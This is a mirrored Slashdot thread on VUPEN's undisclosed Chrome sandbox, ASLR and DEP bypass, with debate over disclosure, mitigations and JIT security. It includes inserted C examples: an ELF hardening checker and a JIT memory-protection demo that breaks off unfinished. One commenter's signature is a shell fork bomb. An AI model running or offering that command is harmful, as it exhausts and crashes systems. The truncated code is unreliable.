Slashdot Mirror


New Chrome Exploit Bypasses Sandbox, ASLR and DEP

Trailrunner7 writes "Researchers at the French security firm VUPEN say they have discovered several new vulnerabilities in Google Chrome that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine. The company said they are not going to disclose the details of the bugs right now, but they have shared information with some of their government customers. The vulnerabilities are present in the latest version of Chrome running on Windows 7, VUPEN said."

150 comments

  1. What about UAC? by Anonymous Coward · · Score: 0

    Will your computer still ask if you want your porn website to compromise your computer?

    1. Re:What about UAC? by gcnaddict · · Score: 1

      Yes, but bear in mind that Microsoft classifies UAC as only being a security "feature" despite the fact that it's actually a user-imposed security boundary.

      --
      Viable Slashdot alternatives: https://pipedot.org/ and http://soylentnews.org/
    2. Re:What about UAC? by Neil+Boekend · · Score: 1

      Not if people have it shut off.

      --
      Well, I might have a way, but it only works on a semi spherical planet in a vacuum.
  2. Disclosure policy by Anonymous Coward · · Score: 3, Insightful

    "This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."

    Oh, I feel SO MUCH better now!

    1. Re:Disclosure policy by Anonymous Coward · · Score: 4, Insightful

      Because ASLR and DEP aren't supposed to be the first line of defense, they are security in depth. The great thing about ASLR, DEP, and "stack canaries" is that you can start using them, and you get a huge amount of protection, -even if you screw up your own code-. The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.

      ASLR and DEP just make existing vulnerabilities harder to exploit. Chrome's bug is still the culprit. Microsoft doesn't deserve -any- of the blame here.

    2. Re:Disclosure policy by blair1q · · Score: 1

      Are you hiding your name from everyone, or are you sharing that only with /.'s government?

    3. Re:Disclosure policy by Anonymous Coward · · Score: 0

      You're likely right about ASLR/DEP but I doubt so about MIC - they're probably exploiting an implementation issue (like video codec parsing outside the sandbox or something) and not a fundamental weakness wrt integrity levels.

      I'm not concerned about this anyhow as the challenge posed is already so high it's eliminated most malware authors from the browser game.

    4. Re:Disclosure policy by EvanED · · Score: 3, Informative

      Being able to bypass them is a testament to their bad implementation... ...my understanding is that ASLR's implementation isn't the best, but IMO it's more like "is a testament to the fact that needing ASLR at all is patching a gunshot with a bandaid".

      And you say C++ is insecure and has stupid control structures, but then suggest writing it in C? Really?

    5. Re:Disclosure policy by bonch · · Score: 1

      The exploit is due to a bug in Chrome. ASLR and DEP aren't catch-all protection mechanisms; they're just a default layer of defense against bad code. I realize this is a vehemently pro-Google site that attempts to deflect any blame toward default scapegoats like Microsoft, but your position is just not accurate in this case.

    6. Re:Disclosure policy by DeadCatX2 · · Score: 1

      LOL I was hoping I wasn't the only person who noticed that...

      --
      :(){ :|:& };:
    7. Re:Disclosure policy by Rockoon · · Score: 5, Interesting

      Browsers such as Chrome contain memory allocations that avoid DEP by using VirtualProtectEx() as it is pretty much a requirement of JIT compilation.

      Blaming Microsoft in this case is extremely premature, since we know that Chrome does in fact disable some protections intentionally.

      --
      "His name was James Damore."
    8. Re:Disclosure policy by icebraining · · Score: 0

      Uh, the sandbox is also provided by the OS, not just ASLR and DEP.

    9. Re:Disclosure policy by Anonymous Coward · · Score: 0

      You're right. They should just post the exploits on every blog out there just to be transparent and trustworthy.

    10. Re:Disclosure policy by kangsterizer · · Score: 1

      "This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."

      Oh, I feel SO MUCH better now!

      They're always doing that and there are many companies like that. Basically, the bugs DO NOT GET FIXED until people (here, Google) pay up, and that's not the $5000 bounty we're talking about.
      These guys literally ask for hundreds of thousands. If not, well, the bug stays there, bad advertisement for the company, etc.

      I know, people should get paid for their work, including the security research. But sometimes it feels like a racket.

    11. Re:Disclosure policy by larry+bagina · · Score: 1

      Google could pay one of their employees to track it down and fix it. If it would cost them $10,000 (opportunity cost, wages, extra time for code review or demonstrating correctness, whatever) to fix it or prevent it, then paying someone else $5,000 is a net win for them.

      --
      Do you even lift?

      These aren't the 'roids you're looking for.

    12. Re:Disclosure policy by asdfghjklqwertyuiop · · Score: 1, Troll

      The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.

      Testament to their effectiveness? If they were broken through then they were not effective.

      ASLR and DEP just make existing vulnerabilities harder to exploit.

      It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.

    13. Re:Disclosure policy by vegiVamp · · Score: 1

      Yes, and no. It may be more expensive in the short term, but it will breed them their own class of security engineers who can then both track other bugs, and provide better design and coding guidelines to prevent future bugs.

      If a security firm, that presumably probes a variety of different software, can make a profit by asking 5k for a found vulnerability, then it's almost a given that in the long term it will be cheaper to have your own people watching fewer programs and having access to the actual codebase.

      --
      What a depressingly stupid machine.
    14. Re:Disclosure policy by Nutria · · Score: 1

      Testament to their effectiveness? If they were broken through then they were not effective.

      Sure they aren't perfectly effective. But if the exploit allowed is of limited utility then that's a Good Thing.

      It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.

      Sure it does, since it contains many exploits, and makes crackers' work more difficult.

      --
      "I don't know, therefore Aliens" Wafflebox1
    15. Re:Disclosure policy by asdfghjklqwertyuiop · · Score: 1

      But if the exploit allowed is of limited utility then that's a Good Thing.

      Is it of limited utility? The summary says "run arbitrary code".

      Sure it does, since it contains many exploits, and makes crackers' work more difficult

      How difficult it was for the crackers to find the hole in the first place does not matter to Chrome users. Someone will figure it out sooner or later, and in the end it's just another Metasploit module that takes 10 seconds to use.

    16. Re:Disclosure policy by mwvdlee · · Score: 1

      I call those "brown hat hackers"; trying to screw over computer users, while somehow still being legal.

      --
      Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?
    17. Re:Disclosure policy by spongman · · Score: 2

      brown hat

      what, like "shit-head" ?

    18. Re:Disclosure policy by Lennie · · Score: 1

      I don't think this is a pro-Google site, it is an anti-Microsoft site. :-)

      --
      New things are always on the horizon
    19. Re:Disclosure policy by Lennie · · Score: 1

      Not only that, someone or more than one from Google or the community (it is an open source project after all) has to look at the problem anyway, if only to see if there are other places that have similar problems.

      --
      New things are always on the horizon
    20. Re:Disclosure policy by weicco · · Score: 1

      Why, did they break IE also?

      --
      You don't know what you don't know.
    21. Re:Disclosure policy by Pigskin-Referee · · Score: 1

      brown hat

      what, like "shit-head" ?

      Brown Hat, Brown Shirt, Shit Head; are we discussing the EC again?

      --
      Pigskin-Referee
      Linux: Yesterday's technology, tomorrow ...
    22. Re:Disclosure policy by kangsterizer · · Score: 1

      Google DOES pay people to look for these bugs all day long, what are you thinking? Every big such company has a group of people that are paid to do just that. And another group of people reviewing the coders' work.
      If bugs were so easy to find, there wouldn't be any left by now. But that's often not the case.

    23. Re:Disclosure policy by coolmadsi · · Score: 1

      I know, people should get paid for their work, including the security researcH. But sometimes it feels like racket.

      Why should they get paid if they weren't asked to do it? Obviously they don't have to say what they found if they aren't paid, but there shouldn't be a sense of entitlement just because they did something (that they weren't asked to do).

  3. What about Google? by d4fseeker · · Score: 3, Informative

    Funny. I don't read anything about them disclosing it to Google (even though they offer a bug bounty). So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.

    1. Re:What about Google? by Anonymous Coward · · Score: 0

      This just in, sources claim the NSA owns French security firm VUPEN! Spokespersons for the French firm categorically denied such reports but then suddenly surrendered.

    2. Re:What about Google? by AHuxley · · Score: 1

      The NSA would like to see the world use more MS. If the world ever splits into local hardened operating systems with real on duty admins, field work gets more difficult.
      With MS in use/gifted at a state/federal level around the world, the US has their tool kit in place. News like this shows what is being offered as finally 'safe' is really rather open.

      --
      Domestic spying is now "Benign Information Gathering"
    3. Re:What about Google? by MtViewGuy · · Score: 1

      I think the folks at the Google Chrome developer team would like to speak to the VUPEN folks and find out exactly what's going on. This is because Chrome does incremental upgrades "in the background" and Google will quietly slip in an update to the browser code to close these vulnerabilities without user intervention.

    4. Re:What about Google? by aztracker1 · · Score: 1

      Wow... so all of your friends and families have systems admins on-duty? I'm sure they also run every game they install or link they click on through security screening. Must get costly... must be very wealthy... think they might be ripe for some bank phishing...

      --
      Michael J. Ryan - tracker1.info
    5. Re:What about Google? by Lennie · · Score: 1

      No, it is locked down of course, they can't install a game. :-)

      --
      New things are always on the horizon
    6. Re:What about Google? by Anonymous Coward · · Score: 0

      Those who Do Lots of Evil don't talk to those who Do No Evil.

    7. Re:What about Google? by Anonymous Coward · · Score: 0

      Exactly, VUPEN are absolute morons.

      They could get paid for this, Google would happily pay them.
      But their attitude is pathetic.

    8. Re:What about Google? by Anonymous Coward · · Score: 0

      This is an interesting issue. If a government agency hires a security firm and that firm finds a vulnerability, as the issue can have a direct impact on the people who are paying their salaries, does the agency have an obligation to inform Google, MS, APPLE etc when bugs like that are found?

    9. Re:What about Google? by maztuhblastah · · Score: 1

      So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.

      While I understand the spirit in which your comment was written (and I happen to agree with you on this particular point), the NSA actually *does* have a mission to ensure US computer security. That's why they invested a hell of a lot of time in developing something like SELinux, which they open-sourced and donated, as well as providing substantial amounts of vulnerability research.

      I'm not saying that their intentions are always pure, but rather that they function as a sort of chaotic good. They're not really on our [US citizens] side. They're not on the "bad guys"' side. They're playing their own game on a totally different field than us... It just so happens that often times our [citizens] interests align with theirs.

    10. Re:What about Google? by MikeBabcock · · Score: 1

      I love a good conspiracy, but could you please explain NSA Linux then?

      --
      - Michael T. Babcock (Yes, I blog)
  4. Good thing... by gman003 · · Score: 0

    Good thing I already run Chrome inside another sandbox (Sandboxie). Sure, there's been exploits for that sandbox, too, but it's uncommon enough that it's extraordinarily unlikely someone would combine the exploits needed. And I have a virus-scanner and firewall running behind all that, just for good measure.

    And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with its own virus-scanner and custom PF rules), then running Firefox (with Javascript disabled, Java not installed, and Flash not even available on that OS) on that. I don't think any existing exploit could crack that.

    1. Re:Good thing... by Anonymous Coward · · Score: 1

      So long as you don't forget to properly affix your tinfoil hat, I'd say you're good to go!

    2. Re:Good thing... by Anonymous Coward · · Score: 0

      Stallman, is that you?

    3. Re:Good thing... by Anonymous Coward · · Score: 1

      You're a belt and suspenders kind of guy, aren't you?

    4. Re:Good thing... by Anonymous Coward · · Score: 0

      That's why I got this Trace Buster BUSTER!

    5. Re:Good thing... by ThunderBird89 · · Score: 1

      I can crack that easily, and get at your data. You forgot rubber hose hacking...

      --
      Hyperbole: I use it liberally!
    6. Re:Good thing... by Anonymous Coward · · Score: 0

      +1 Big Hit

    7. Re:Good thing... by Anonymous Coward · · Score: 1

      Last I checked Sandboxie was an IO-layer sandbox; a kernel or os/service exploit would skip right over your sandbox without even noticing its presence.

    8. Re:Good thing... by Anonymous Coward · · Score: 0

      Good thing I already run Chrome inside another sandbox (Sandboxie). Sure, there's been exploits for that sandbox, too, but it's uncommon enough that it's extraordinarily unlikely someone would combine the exploits needed. And I have a virus-scanner and firewall running behind all that, just for good measure.

      And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with its own virus-scanner and custom PF rules), then running Firefox (with Javascript disabled, Java not installed, and Flash not even available on that OS) on that. I don't think any existing exploit could crack that.

      All you need now is a virus (or other fully automated, self-propagating malware) infecting OpenBSD machines in the wild and all the resources used by that virus scanner will be completely justified.

      Really if you are running a virus scanner on any *nix machine, you're either doing it on behalf of Windows systems (i.e. on a *nix mailserver that has Windows clients) or you're doing something wrong. *nix has an effective security system and expects its administrators to know how to use it, therefore *nix doesn't have these bullshit problems.

      Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

    9. Re:Good thing... by Anonymous Coward · · Score: 0

      Sup dawg, I herd you liek sandboxes so I put a sandbox in your sandbox so you can sandbox while you're sandboxing!

    10. Re:Good thing... by gman003 · · Score: 1

      I have the virus scanner on my BSD box so I can scan suspicious files before accessing them from my Windows boxes (the BSD box is my general-purpose "server", including running Samba). And to be fair, it's been months since I found a file suspicious enough to deserve the full treatment.

    11. Re:Good thing... by Anonymous Coward · · Score: 0

      Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

      What makes you think he is paranoid?

    12. Re:Good thing... by EoN604 · · Score: 2

      I always chuckle when I hear of people disabling JavaScript in this day and age. Reminds me of a guy from an old job who used to disable images in his browser, saying they were unnecessary bloat that weren't important and shouldn't be a part of the web.

    13. Re:Good thing... by BlueScreenO'Life · · Score: 1

      Me, running a BSD licensed OS?

      I run GNU Hurd, you insensitive clod.

      - rms

    14. Re:Good thing... by RobbieThe1st · · Score: 1

      Thing is, I wouldn't /like/ to have to disable JS, or run NoScript, but thanks to poor implementations of ad code, disabling it can /seriously/ speed up loading on a high(ish) latency connection.
      And that's on top of all the potential attack vectors.

      Speaking of which, /. runs /much/ faster on my phone when you disable JS - None of this slow ajax and hugely-long page to re-render when you add a comment.

    15. Re:Good thing... by alostpacket · · Score: 2

      Good luck, I'm behind 7 Sandboxies.

      --
      PocketPermissions Android Permission Guide
    16. Re:Good thing... by Anonymous Coward · · Score: 0

      I have the virus scanner on my BSD box so I can scan suspicious files before accessing them from my Windows boxes (the BSD box is my general-purpose "server", including running Samba). And to be fair, it's been months since I found a file suspicious enough to deserve the full treatment.

      That would fit the "on behalf of Windows systems" criteria the GP already specified, making your post a completely redundant "me too!"

      God damn, reading comprehension is on the decline.

    17. Re:Good thing... by mlts · · Score: 1

      Never say never. I recall reading some malware can detect the presence of VMware and/or Sandboxie and get around it. Sandboxie helps, but it is of limited protection on 64 bit systems.

    18. Re:Good thing... by gman003 · · Score: 1

      Actually, I really disabled it because it's running on an Athlon 900 with 384MB of RAM. The security advantage is a side-benefit.

    19. Re:Good thing... by stimpleton · · Score: 2

      7 sand *BOXXYS* ...fixed

      --
      In post Patriot Act America, the library books scan you.
    20. Re:Good thing... by Anonymous Coward · · Score: 0

      thanks for the good tweet!

    21. Re:Good thing... by Nutria · · Score: 1

      it's running on an Athlon 900

      Why?

      It's not old enough to be Retro, yet not fast enough to run a GUI in 2011.

      --
      "I don't know, therefore Aliens" Wafflebox1
    22. Re:Good thing... by gman003 · · Score: 1

      Because that was what was in my spare box. Seriously, the machine's cobbled together from salvage - a CPU/mobo from one machine, a video card from another (GeForce 2, not that it actually accelerates anything), RAM from two different sources, hard drives from three, and miscellaneous CD drives and floppy drives, just because. And the software is equally... Frankensteinian. Samba, Apache, MySQL, a full X desktop (it's my backup backup ordinary-use computer), FTPD, a couple other things I've forgotten, and DosBox.

      On the bright side, I'm comfortable experimenting with it. If I break it, I know how to do a full reinstall, and with three hard drives (not in any sort of RAID), I can keep a backup "image" ready. If the hardware breaks, I can just grab slightly older stuff from the Big Bin of Parts. It's practically disposable.

    23. Re:Good thing... by LynnwoodRooster · · Score: 1

      Add a drawstring as well and you're 100% on target...

      --
      Browsing at +1 - no ACs, I ignore their posts. So refreshing!
    24. Re:Good thing... by inglorion_on_the_net · · Score: 1

      Really if you are running a virus scanner on any *nix machine, you're either doing it on behalf of Windows systems (i.e. on a *nix mailserver that has Windows clients) or you're doing something wrong.

      I'm not so sure about that. There seems to be a persistent idea that *nix is somehow secure, but that is not actually true. There have been vulnerabilities and exploits for *nix, and I have seen a number of compromised Linux installations. OpenBSD seems to be one of the few operating system projects taking security as seriously as I think they should, but even they have had vulnerabilities in the core system, not to mention vulnerabilities in the applications people run on it. And let's not forget that most of it is written in C, a language known to be full of opportunities for creating vulnerabilities.

      Now, I am not claiming that running a virus scanner would be a good idea. It will use up computer resources, but will it actually stop the attacks? However, I think we in the *nix world should work a lot harder to secure our systems than most of us currently do. To give you something to think about: Windows has had ASLR and NX enabled for core parts of the system for a few releases now. Many popular Linux distros don't enable either feature for any software. Also, Linux (the kernel) is huge. What protections does your favorite distro offer against bugs and exploits in code that runs in kernel space?

      Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

      Calling computer security-minded people paranoid would be funny if it weren't so sad. The truth is that the Internet is full of automatic exploits and there is a large industry built on exploiting software (of which the exploit this story is about is an example). Too many people think they have nothing to fear, while, in reality, governments, script kiddies, and professional criminals are all out to get you. Maybe not you personally, but they will welcome the addition of your computer to their botnet or database, regardless of who you are. Good computer security isn't paranoia, it's protection against the very real possibility that your computer will be used to send spam, participate in denial of service attacks, various criminal activities, or simply to gather information about you and your friends, relatives, and acquaintances.

      If you don't see computer security as a big deal, perhaps it would help to imagine what your inbox would look like if there was no spam filtering (spam comprises the majority of all email, and the bulk of email spam is sent from exploited computers), or you can speak to any of the people whose personal data have been used to take out loans or commit criminal activities in their name. I hope that you will never experience anything like that first-hand, but you should know that, if you aren't vigilant about computer security, you may unknowingly be facilitating these things.

      --
      Please correct me if I got my facts wrong.
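The question inglorion_on_the_net raises (whether a given Linux binary actually gets ASLR and NX) is answerable from the ELF program headers alone. The following is an added example by the editor, not code from the thread, from any distro tool, or from Chrome: a minimal "checksec" in C that reports whether an ELF64 image is a PIE (so ASLR can relocate it), whether its stack is marked non-executable, and whether it requests RELRO. It uses glibc's `<elf.h>`; the sample image it builds is constructed for the demo and is not a real file, and the `struct hardening` fields and function names are the editor's own.

```c
/* Added example (editor's, not from the thread): a minimal "checksec" that
 * reads ELF64 program headers for a Linux binary: is it a PIE (so ASLR can
 * randomize its base), is the stack marked non-executable, and does it
 * request RELRO. Uses <elf.h> from glibc; the sample image built below is
 * constructed for the demo, not a real file. */
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct hardening {
    int pie;        /* ET_DYN with a PT_INTERP: an executable ASLR can relocate */
    int nx_stack;   /* PT_GNU_STACK present and without PF_X */
    int relro;      /* PT_GNU_RELRO present (at least partial RELRO) */
};

/* Inspect an ELF64 image held in memory. Returns 0 on success, -1 if buf is
 * not a little-endian ELF64 file or its program headers run past len. */
int checksec_image(const unsigned char *buf, size_t len, struct hardening *h)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh || memcmp(buf, ELFMAG, SELFMAG) != 0) return -1;
    memcpy(&eh, buf, sizeof eh);               /* memcpy: buf may be unaligned */
    if (eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_ident[EI_DATA] != ELFDATA2LSB)
        return -1;
    if (eh.e_phoff > len || (size_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
        return -1;

    int has_interp = 0, has_gnu_stack = 0, stack_exec = 0;
    memset(h, 0, sizeof *h);
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, buf + eh.e_phoff + (size_t)i * sizeof ph, sizeof ph);
        switch (ph.p_type) {
        case PT_INTERP:    has_interp = 1; break;
        case PT_GNU_STACK: has_gnu_stack = 1; stack_exec = (ph.p_flags & PF_X) != 0; break;
        case PT_GNU_RELRO: h->relro = 1; break;
        default: break;
        }
    }
    /* Shared libraries are ET_DYN too; the PT_INTERP is what marks a PIE executable. */
    h->pie = (eh.e_type == ET_DYN) && has_interp;
    /* With no PT_GNU_STACK marker at all the kernel falls back to an executable
     * stack on x86 (the pre-NX default), so "no marker" counts as not NX. */
    h->nx_stack = has_gnu_stack && !stack_exec;
    return 0;
}

/* Build a constructed ELF64 image containing only the headers this check
 * reads. exec_stack sets PF_X on PT_GNU_STACK. Returns bytes written, 0 if
 * cap is too small. */
size_t build_sample(unsigned char *out, size_t cap, int pie, int exec_stack, int relro)
{
    Elf64_Ehdr eh;
    Elf64_Phdr ph[3];
    int n = 0;
    memset(&eh, 0, sizeof eh);
    memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = pie ? ET_DYN : ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof(Elf64_Phdr);
    ph[n].p_type = PT_INTERP; ph[n].p_flags = PF_R; n++;     /* dynamically linked */
    ph[n].p_type = PT_GNU_STACK;
    ph[n].p_flags = PF_R | PF_W | (exec_stack ? PF_X : 0); n++;
    if (relro) { ph[n].p_type = PT_GNU_RELRO; ph[n].p_flags = PF_R; n++; }
    eh.e_phnum = (Elf64_Half)n;

    size_t total = sizeof eh + (size_t)n * sizeof(Elf64_Phdr);
    if (cap < total) return 0;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, ph, (size_t)n * sizeof(Elf64_Phdr));
    return total;
}

/* Run the same check on a file on disk (e.g. /proc/self/exe or /usr/bin/ls). */
int checksec_file(const char *path, struct hardening *h)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    unsigned char buf[1 << 16];                /* the headers sit at the front */
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    return checksec_image(buf, n, h);
}

int main(int argc, char **argv)
{
    struct hardening h;
    const char *path = argc > 1 ? argv[1] : "/proc/self/exe";
    if (checksec_file(path, &h) != 0) { fprintf(stderr, "%s: not ELF64\n", path); return 1; }
    printf("%s: PIE=%d NX-stack=%d RELRO=%d\n", path, h.pie, h.nx_stack, h.relro);
    return 0;
}
```

Run it against a few binaries from your own distro to see the point in practice: a non-PIE executable loads at the same address every time regardless of `randomize_va_space`, and a binary with no `PT_GNU_STACK` marker gets an executable stack from the kernel, which is why "the OS has NX" says nothing about whether a particular program benefits from it.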
    25. Re:Good thing... by Anonymous Coward · · Score: 0

      don't use 64bit systems ;)

    26. Re:Good thing... by MikeBabcock · · Score: 1

      I use Noscript on websites until I've determined I need the scripts. Its easy enough to enable them once I'm there, and much much faster to load complex websites without it.

      --
      - Michael T. Babcock (Yes, I blog)
  5. Smug by Anonymous Coward · · Score: 1

    I am so glad I run [insert smug zealous OS plug here] and not Windows!

    1. Re:Smug by Anonymous Coward · · Score: 0

      The real question is:
      Does it run on Linux?

    2. Re:Smug by the+linux+geek · · Score: 1

      Bull GCOS 7 would never have these kinds of vulnerabilities.

    3. Re:Smug by clang_jangle · · Score: 2

      Still mistaking anyone who triggers your natural feeling of inferiority (that comes with making poor choices) for "smugness", I see. No, we're not smug -- we're just better than you.

      --
      Caveat Utilitor
    4. Re:Smug by flimflammer · · Score: 2

      That was pretty smug.

    5. Re:Smug by MikeBabcock · · Score: 1

      Any OS runs on Linux with http://qemu.org/ :)

      --
      - Michael T. Babcock (Yes, I blog)
  6. Keywords making all the difference by bogaboga · · Score: 0

    that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine.

    "...on a vulnerable machine...". Those are the keywords. So how is it a Chrome problem when the machine itself is vulnerable?

    By the way, it was about time for /. to embed video. Please allow the same for pictures especially for slashdotters here.

    1. Re:Keywords making all the difference by Anonymous Coward · · Score: 0

      One word why they will never allow for embedded pictures: goatse.

    2. Re:Keywords making all the difference by blair1q · · Score: 1

      embedded video of goatse website on grimy monitor in 3...2...

    3. Re:Keywords making all the difference by vajorie · · Score: 2

      So how is it a Chrome problem when the machine itself is vulnerable?

      The answer was in the few words before the ones you highlighted:

      bypass the browser's sandbox ... and run arbitrary code

    4. Re:Keywords making all the difference by Anonymous Coward · · Score: 0

      FTFS:

      The vulnerabilities are present in the latest version of Chrome

      FTFA:

      While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP.

      I guess I can understand not reading the article, please take the time to read the entire summary before shooting your mouth off. How did this get voted up?

    5. Re:Keywords making all the difference by Anonymous Coward · · Score: 0

      the machine is vulnerable BECAUSE it is running an exploitable version of chrome.

  7. I don't care about theoretical/researched exploits by Anonymous Coward · · Score: 0

    Tell me when an exploit of this magnitude (including the one which affected IE8) actually exists in the wild. Very few virus authors have the skill to discover and chain multiple independent exploits targeting different and non-outdated technology.

  8. HBGary, anyone? by Anonymous Coward · · Score: 1

    This "VUPEN security" company, how are they any different from HBGary? They sold 0days to governments too...

    I just want the damn hole closed.

  9. from vulpen site by JonySuede · · Score: 2, Funny

    As the world leader in vulnerability research, VUPEN provides offensive and highly sophisticated exploits specifically designed for Law Enforcement and Intelligence Agencies to help them achieve their offensive missions using tailored and unique codes created in-house by VUPEN.

    God I hate those french researchers, liberty fraternity equality OR DEATH my ass

    --
    Jehovah be praised, Oracle was not selected
    1. Re:from vulpen site by spongman · · Score: 4, Insightful

      wait... in whose screwed up version of utopia do "law enforcement agencies" need "tailored and unique codes" in order to carry out their "offensive missions" ?

      alternative choices:
      1) get a bench warrant.
      2) don't.

    2. Re:from vulpen site by JonySuede · · Score: 1

      thanks, you got my point unlike the offended mod

      --
      Jehovah be praised, Oracle was not selected
    3. Re:from vulpen site by Nutria · · Score: 1

      3) Get a FISA warrant and install the exploit on some alleged spy's PC.

      --
      "I don't know, therefore Aliens" Wafflebox1
    4. Re:from vulpen site by Anonymous Coward · · Score: 0

      You skilfully dropped the "Intelligence Agencies" part, which is the most relevant here... For example I would expect the FBI to use warrants, but not the CIA.

    5. Re:from vulpen site by Anonymous Coward · · Score: 0

      Well.. I could see how this would be helpful for foreign ops.
      Such as perhaps an intelligence sting by the CIA in another country?

  10. Vulnerabilities by magamiako1 · · Score: 2

    Just throwing this out there:

    These problems won't affect 95% of users. Running these sorts of attacks on end users is a bit of a waste, and something this complicated would be saved for more important targets.

    A vast majority of infections out there are things that you're already guarded against if you keep your system updated.

  11. So... by CrazyDuke · · Score: 3

    You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, either through an extension designed like a high school side-project or using the built in white-listing feature. This is apparently because the API does not allow for functionality along the lines of blocking individual scripts from executing.

    The forums and comments sections addressing user questions as to an alternative usually had self serving replies like "Chrome is so awesome that it doesn't need script blocking." and "It can't be owned due to sand-boxing. You know what sand-boxing is right?" (Because the only reason a person would ask is if they were an ignorant fool, right?)

    So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?

    --
    Any sufficiently advanced influence is indistinguishable from control.
    1. Re:So... by VortexCortex · · Score: 4, Insightful

      You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, [...]

      So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?

      I'll tell you why: Because Google's JavaScript engine compiles any script it sees into machine code for your platform, then runs that... That's why you don't need a better option for security's sake than all or none... Machine code can't escape the sand box! (Realize the truth: There is no spoon^H^H^H^H^H sandbox.)

      The problem is that modern JS engines from all the major browsers do it this way -- The design of the JS language makes it hard to make a fast interpreter for it. Even if you pre-compile to byte-code and run it in a VM it's too slow.

      So instead, we take arbitrary data, compile that to machine code, then EXECUTE the compiled DATA (Data Execution Prevention, eh? Well, if it's flagging itself as executable, and it's accepting arbitrary code, I'd say that JS == Arbitrary remote code execution == one tiny step away from being an exploit anyway.) I've always wondered why everyone disses ActiveX while enabling JS...

      PS. I've written scripting languages. They can be slow as hell, that's the point, so long as stuff you do a lot of is formalized and written in native code, it's all good and can be run in a pretty safe interpreter or byte-code VM.

      JS != general purpose compiled language.

      Therefore, when you do DUMB things like complain that JS can't keep up when you try to use JS + HTML5 Canvas as your "rendering engine" for a "web application" (or even worse, games) then browser devs must meet the dumb demands by doing the dumbest thing they can against their better judgment -- Just in Time compile a virtual EXE, then run that.

      The answer is to stop sacrificing security for speed, go back to software VM solutions with SIMPLE compiled languages like Lua, (I think, Lisp / Scheme too, not sure haven't checked how complex the sources are) and add standardized functions for commonly used features so we can get rid of the if(IE){...} cruft. Hint: Dynamic is the enemy of fast.

    2. Re:So... by lucian1900 · · Score: 2

      That's bullshit. JIT compilers increase the attack surface somewhat, but not significantly.

      Also, interpretation is always going to be slow. Lua is very slow without LuaJIT. So are most Scheme and Common Lisp implementations. Which is why no one in their right mind would turn off the JIT.

      A JIT may be harder to write than a bytecode interpreter, but it's not much harder to make secure.

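What the two comments above are arguing about, shown in code. This is an added example, not code from the original thread or from any browser engine: a minimal JIT that compiles "return N" to native instructions at runtime and executes them, once the naive way (one page that is readable, writable and executable for its whole lifetime, so DEP has nothing to deny) and once under the W^X discipline real engines moved to (the page is writable while the code is emitted, then flipped to read+execute before the first call, so no page is ever both writable and executable at the same instant). It uses POSIX mmap/mprotect as the stand-in for VirtualAlloc/VirtualProtect on Windows, only knows the x86-64 and AArch64 encodings, and the function names (emit_return_const, jit_run_const) are this example's own.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

typedef int (*jit_fn)(void);

/* Emit native code for "return value" into buf and return the byte count.
 * Only x86-64 and AArch64 encodings are included; other targets return 0. */
static size_t emit_return_const(unsigned char *buf, int32_t value)
{
#if defined(__x86_64__)
    buf[0] = 0xB8;                      /* mov eax, imm32 */
    memcpy(buf + 1, &value, 4);
    buf[5] = 0xC3;                      /* ret */
    return 6;
#elif defined(__aarch64__)
    uint32_t lo = (uint32_t)value & 0xFFFFu;
    uint32_t hi = ((uint32_t)value >> 16) & 0xFFFFu;
    uint32_t insn[3] = {
        0x52800000u | (lo << 5),        /* movz w0, #lo          */
        0x72A00000u | (hi << 5),        /* movk w0, #hi, lsl #16 */
        0xD65F03C0u                     /* ret                   */
    };
    memcpy(buf, insn, sizeof insn);
    return sizeof insn;
#else
    (void)buf; (void)value;
    return 0;
#endif
}

/* Compile "return value" at runtime and execute it.
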